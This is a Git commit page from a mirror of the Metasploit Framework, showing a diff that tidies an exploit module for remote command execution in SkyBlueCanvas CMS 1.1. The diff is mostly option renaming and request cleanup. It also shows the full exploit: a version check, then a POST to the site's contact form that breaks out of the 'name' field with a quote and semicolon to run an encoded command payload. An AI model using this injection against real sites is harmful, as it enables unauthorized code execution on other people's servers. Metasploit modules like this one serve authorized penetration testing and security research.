infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Changes as requested in SkyBlue Canvas RCE module

bug/bundler_fix
xistence 2014-01-31 12:52:48 +07:00
parent bac6e2a3e1
commit ffd8f7eee0
1 changed files with 13 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
modules/exploits/multi/http/skybluecanvas_exec.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'RequiredCmd' => 'generic perl ruby bash telnet python'
}
},
'Platform' => %w{ linux unix },
'Platform' => %w{ unix },
'Targets' =>
[
['SkyBlueCanvas', {}]
@ -49,40 +49,41 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('URI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
],self.class)
end
def check
uri = normalize_uri(datastore['URI'], "index.php")
uri = normalize_uri(target_uri.path.to_s, "index.php")
res = send_request_raw(
{
'uri' => uri
}, 25)
})
if (res and res.body =~ /[1.1 r248]/)
if res and res.body =~ /[1.1 r248]/
print_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found")
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(datastore['URI'], "index.php?pid=4")
uri = normalize_uri(target_uri.path.to_s, "index.php")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_get' => { 'pid' => '4' },
'vars_post' =>
{
'cid' => "3",
'cid' => '3',
'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
'email' => rand_text_alphanumeric(10),
"subject" => rand_text_alphanumeric(10),
"message" => rand_text_alphanumeric(10),
"action" => "Send"
'subject' => rand_text_alphanumeric(10),
'message' => rand_text_alphanumeric(10),
'action' => 'Send'
}
}, 25)
})
end
end